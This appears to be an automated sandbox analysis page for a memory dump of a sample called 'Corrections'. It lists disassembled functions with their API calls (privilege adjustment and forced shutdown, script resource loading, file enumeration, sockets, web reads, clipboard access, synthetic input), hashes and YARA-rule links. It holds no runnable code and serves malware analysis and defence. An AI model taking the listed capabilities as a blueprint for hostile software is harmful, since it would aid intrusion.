Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 02ad6790f0d0b94fd5f1afc43f44ca3cdb1eb9332709087142b2868d81e3474e
Instruction ID: 02b9cfa7755b7e2dc89b9bf71c17bd35f1718d1d7a039aa1cab5d9a6831f52ee
Opcode Fuzzy Hash: 02ad6790f0d0b94fd5f1afc43f44ca3cdb1eb9332709087142b2868d81e3474e
Instruction Fuzzy Hash: FD419C31609611EFD710CF19E898B15BBE4FF44328F14C5A8E82A8B762DB35EC42CB90

Function 0098F20D Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00982010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0098205A
Part of subcall function 00982010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00982087
Part of subcall function 00982010: GetLastError.KERNEL32 ref: 00982097

ExitWindowsEx.USER32(?,00000000), ref: 0098F249

Strings

@, xrefs: 0098F23C
, xrefs: 0098F273
SeShutdownPrivilege, xrefs: 0098F219
, xrefs: 0098F237

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: a94e1161bc911a67a8a24843bfd56020cf24ae2b2652a9e927834766acb3c772
Instruction ID: d146777fd4d91377faa19eb5b3dc3c4c2ba273075a77fa282a33368f86ad2a95
Opcode Fuzzy Hash: a94e1161bc911a67a8a24843bfd56020cf24ae2b2652a9e927834766acb3c772
Instruction Fuzzy Hash: C601497A6252106BEB2472B89C9AFBF736C9F08354F100930FD23E23D2E6644D0093A0

Function 0095BCD2 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0095BD54
_free.LIBCMT ref: 0095BD78
_free.LIBCMT ref: 0095BEFF
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,009C46D0), ref: 0095BF11
WideCharToMultiByte.KERNEL32(00000000,00000000,009F221C,000000FF,00000000,0000003F,00000000,?,?), ref: 0095BF89
WideCharToMultiByte.KERNEL32(00000000,00000000,009F2270,000000FF,?,0000003F,00000000,?), ref: 0095BFB6
_free.LIBCMT ref: 0095C0CB

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: 66fe58edfe7c332085e4d3df09d16e4350cbdfb7f2ab3adc4109691b408f49b2
Instruction ID: 7161bb89789689af0155bc6ca7afaa1229619ab4a89be3089b488cfa571fcbcc
Opcode Fuzzy Hash: 66fe58edfe7c332085e4d3df09d16e4350cbdfb7f2ab3adc4109691b408f49b2
Instruction Fuzzy Hash: DDC118719042049FDB24DF7ADC42BAA7BBDEF82321F184559ED949B191E7308E49CB90

Function 00993A0E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,009656C2,?,?,00000000,00000000), ref: 00993A1E
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,009656C2,?,?,00000000,00000000), ref: 00993A35
LoadResource.KERNEL32(?,00000000,?,?,009656C2,?,?,00000000,00000000,?,?,?,?,?,?,009266CE), ref: 00993A45
SizeofResource.KERNEL32(?,00000000,?,?,009656C2,?,?,00000000,00000000,?,?,?,?,?,?,009266CE), ref: 00993A56
LockResource.KERNEL32(009656C2,?,?,009656C2,?,?,00000000,00000000,?,?,?,?,?,?,009266CE,?), ref: 00993A65

Strings

SCRIPT, xrefs: 00993A2B

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 8f741d0a16224ab63b639141175e2e791b0b968372feb30b4355a1b7e92fc082
Instruction ID: 83a6c7239c3138adaef31a9f8c0685e77593d2362ca3970883016577ffa977a9
Opcode Fuzzy Hash: 8f741d0a16224ab63b639141175e2e791b0b968372feb30b4355a1b7e92fc082
Instruction Fuzzy Hash: 67115A70201741AFEB218F69DD48F277BBDEFC5B61F14826CB41296250EB71DD009620

Function 009820AA Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00981900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00981916
Part of subcall function 00981900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00981922
Part of subcall function 00981900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00981931
Part of subcall function 00981900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00981938
Part of subcall function 00981900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0098194E

GetLengthSid.ADVAPI32(?,00000000,00981C81), ref: 009820FB
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00982107
HeapAlloc.KERNEL32(00000000), ref: 0098210E
CopySid.ADVAPI32(00000000,00000000,?), ref: 00982127
GetProcessHeap.KERNEL32(00000000,00000000,00981C81), ref: 0098213B
HeapFree.KERNEL32(00000000), ref: 00982142

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 96b4774f3932e1b3450b91690e268b5ead8234e9b5eaa1e981ce56d917ce50b4
Instruction ID: ed3fcb6a6a97d32694fb1c01fa56a23435b7ef775d37ab826b32710da390b985
Opcode Fuzzy Hash: 96b4774f3932e1b3450b91690e268b5ead8234e9b5eaa1e981ce56d917ce50b4
Instruction Fuzzy Hash: 511100B2519205FFDB14AF64CC0CBAE7BBDEF40365F20411CE941A7220D3399900DB60

Function 0099A570 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0092B329: _wcslen.LIBCMT ref: 0092B333

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 0099A5BD
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 0099A6D0

Part of subcall function 009942B9: GetInputState.USER32 ref: 00994310
Part of subcall function 009942B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009943AB

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 0099A5ED
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 0099A6BA

Strings

*.*, xrefs: 0099A5A2

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: 661ffea26a2655439215b99f9ea2d71525def3a4d3cee869bb16ef678cb62f93
Instruction ID: ca3d6aa10eba4bfdcc9bb10ec5b8e50b4ea17939a48eb2b1977b722181fe3c42
Opcode Fuzzy Hash: 661ffea26a2655439215b99f9ea2d71525def3a4d3cee869bb16ef678cb62f93
Instruction Fuzzy Hash: 0141A37190420AAFDF15DFA8DD49BEEBBB8EF44310F184155F805A2191EB319E44CFA2

Function 009222AD Relevance: 7.8, APIs: 5, Instructions: 308COMMON

Download Yara Rule

APIs

DefDlgProcW.USER32(?,?), ref: 0092233E
GetSysColor.USER32(0000000F), ref: 00922421
SetBkColor.GDI32(?,00000000), ref: 00922434

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Color$Proc
String ID:
API String ID: 929743424-0
Opcode ID: 23a890ec1743059375b3fa07da1f99f6bbc06f8debb9e7491cb34a8c33ddf750
Instruction ID: 71d0af62defc46e7430929a64c60ad0530132c7310e68c1d1c18ba2290f250ba
Opcode Fuzzy Hash: 23a890ec1743059375b3fa07da1f99f6bbc06f8debb9e7491cb34a8c33ddf750
Instruction Fuzzy Hash: 5C8146B0118120BEE639BB3CAD98FFF255EEB82B10F214609F102C659EC95D9F41D276

Function 009A2263 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 009A3AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 009A3AD7
Part of subcall function 009A3AAB: _wcslen.LIBCMT ref: 009A3AF8

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 009A22BA
WSAGetLastError.WSOCK32 ref: 009A22E1
bind.WSOCK32(00000000,?,00000010), ref: 009A2338
WSAGetLastError.WSOCK32 ref: 009A2343
closesocket.WSOCK32(00000000), ref: 009A2372

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: 0378c6eb9ec50b708821882d71236e41f886c96b51471eb8c3ab1fdc1628d400
Instruction ID: cb5c7db6fdb7f246c064caef3d98d8e728907bc0fd0974731a0f3236d7e04602
Opcode Fuzzy Hash: 0378c6eb9ec50b708821882d71236e41f886c96b51471eb8c3ab1fdc1628d400
Instruction Fuzzy Hash: CA51D471A00210AFEB10EF68D886F2A77E5AB85714F148498F9455F3D3DB74AD41CBE1

Function 009B26DD Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 009B275C
IsWindowEnabled.USER32 ref: 009B276A
GetForegroundWindow.USER32(?,?,00000001,?), ref: 009B2777
IsIconic.USER32 ref: 009B2785
IsZoomed.USER32 ref: 009B2793

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 29fcf840695efe50037816a0b04997313e55d02c21c81304977ea6b087d20981
Instruction ID: 8fc59a77daf80c530030e93fe4bc2bee0f6bd76053a45b7fac288415a6687cc9
Opcode Fuzzy Hash: 29fcf840695efe50037816a0b04997313e55d02c21c81304977ea6b087d20981
Instruction Fuzzy Hash: E121E0357052119FE7219F26CA84B9A7BE9EF85334F188068E84A8B351DF71FD42CB94

Function 0099D889 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 0099D8CE
GetLastError.KERNEL32(?,00000000), ref: 0099D92F
SetEvent.KERNEL32(?,?,00000000), ref: 0099D943

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: 0a270d8d1581d94d92ff51b387355cdd65cc067fe13f260023c8e94f9779dc1a
Instruction ID: 85acff42e84b8a20498dc2063488b1eaf6b8de743b1d28f2c317d7691b9cbb90
Opcode Fuzzy Hash: 0a270d8d1581d94d92ff51b387355cdd65cc067fe13f260023c8e94f9779dc1a
Instruction Fuzzy Hash: E821AFB5506705EFEB20AF6AC988BAAB7FCEB41324F10442DE64692142E774EE04DB50

Function 0098E472 Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,009646AC), ref: 0098E482
GetFileAttributesW.KERNEL32(?), ref: 0098E491
FindFirstFileW.KERNEL32(?,?), ref: 0098E4A2
FindClose.KERNEL32(00000000), ref: 0098E4AE

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: 01b6806a8bfdb8bb4a4430e48301c0b27bbd5226a66ab9023946336421d6e51c
Instruction ID: 9111eabe18868822aa7b535ba4e890b6492073a102a9dfe10ccde3219da39e25
Opcode Fuzzy Hash: 01b6806a8bfdb8bb4a4430e48301c0b27bbd5226a66ab9023946336421d6e51c
Instruction Fuzzy Hash: EBF0E53042991057D21477BCAD0D8AB776DAE82335B504701F83AC22F0E7BCDD95A7D5

Function 0097E5F4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0097E5F8

Strings

%.3d, xrefs: 0097E603
X64, xrefs: 0097E680

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: 1cc03b5ce5e498c6af9d80250b857ea99ab84b33b0b98b7bc7ee1bc61244b8cf
Instruction ID: bfeaf9b9085edf70bbd4d5d6562ee1cc5708c6611ce3c41e2230d7609746f307
Opcode Fuzzy Hash: 1cc03b5ce5e498c6af9d80250b857ea99ab84b33b0b98b7bc7ee1bc61244b8cf
Instruction Fuzzy Hash: 56D012B2C08108D6CBD097909D48DBA737CAB1C304F10CCA2F90A91040E6389904AB21

Function 00952992 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 00952A8A
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 00952A94
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 00952AA1

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 5c78b931b49a181ea3c91dc5e7571c9922a642655e5d4cd6b7b21de995600da0
Instruction ID: f60db1bcee39b7375e97716c910dd7b64e6b355c61528e5c150f1344b7a1c8ac
Opcode Fuzzy Hash: 5c78b931b49a181ea3c91dc5e7571c9922a642655e5d4cd6b7b21de995600da0
Instruction Fuzzy Hash: E231B7759112289BCB21DF64D989B9DBBB8BF48310F5042DAE81CA6291E7309F858F45

Function 00982010 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 0094014B: __CxxThrowException@8.LIBVCRUNTIME ref: 009409D8
Part of subcall function 0094014B: __CxxThrowException@8.LIBVCRUNTIME ref: 009409F5

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0098205A
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00982087
GetLastError.KERNEL32 ref: 00982097

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: e202c66c84cb61b1df4bca6c999d016f8553ba1745d2c4ec0d0daf51f75d4fef
Instruction ID: c21e58aa4e53f0e7ad8e217edd931c2840d080b2227d8afc4cabfc2f8485099b
Opcode Fuzzy Hash: e202c66c84cb61b1df4bca6c999d016f8553ba1745d2c4ec0d0daf51f75d4fef
Instruction Fuzzy Hash: 9311BFB1414205AFD728AF54DC86E6BB7BCEF48720B20852EE44653251EB70BC41CB20

Function 00945058 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,0094502E,?,009E98D8,0000000C,00945185,?,00000002,00000000), ref: 00945079
TerminateProcess.KERNEL32(00000000,?,0094502E,?,009E98D8,0000000C,00945185,?,00000002,00000000), ref: 00945080
ExitProcess.KERNEL32 ref: 00945092

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: a536ea0ade9d92ef01a052a848c93089dd057c0b65be3ea26924d5f749a7db83
Instruction ID: 8448d02ce072b8e7a8726aa31fd77c4545c107bf7abe69c84718e98837d2245b
Opcode Fuzzy Hash: a536ea0ade9d92ef01a052a848c93089dd057c0b65be3ea26924d5f749a7db83
Instruction Fuzzy Hash: A7E08C35016508AFCF216F94CE08E583BADEF50395F024514F8098A133EB35DD42DBC0

Function 0097E652 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 0097E664

Strings

X64, xrefs: 0097E680

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: 716f16e4a22e603a9bc39c00dddfa108cce72ec9f3ae5c0bfc0d8aed4d3467cd
Instruction ID: 7eaed99187b3228fe0a0486cc90d10cc3a9dfb95ef239065bde76b29660096a3
Opcode Fuzzy Hash: 716f16e4a22e603a9bc39c00dddfa108cce72ec9f3ae5c0bfc0d8aed4d3467cd
Instruction Fuzzy Hash: 2BD0C9B581511DEACB80DB50EC88DDA73BCBB08308F104A91F106A2040D73495489F14

Function 009941FA Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,009A52EE,?,?,00000035,?), ref: 00994229
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,009A52EE,?,?,00000035,?), ref: 00994239

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 1dbe37418d2eb1d76790a2bc6b20f1cf92e5cd978c2c0a1376c4529627db0905
Instruction ID: c933fca2d0c583dece303c190bea39ae2eeabd4cd9113b043f3c844fc0a3a853
Opcode Fuzzy Hash: 1dbe37418d2eb1d76790a2bc6b20f1cf92e5cd978c2c0a1376c4529627db0905
Instruction Fuzzy Hash: 6DF0A0306052256AEB205769AC4DFAF36ADEFC5B71F000275F515D2185D9609A0087B0

Function 0098BBED Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0098BC24
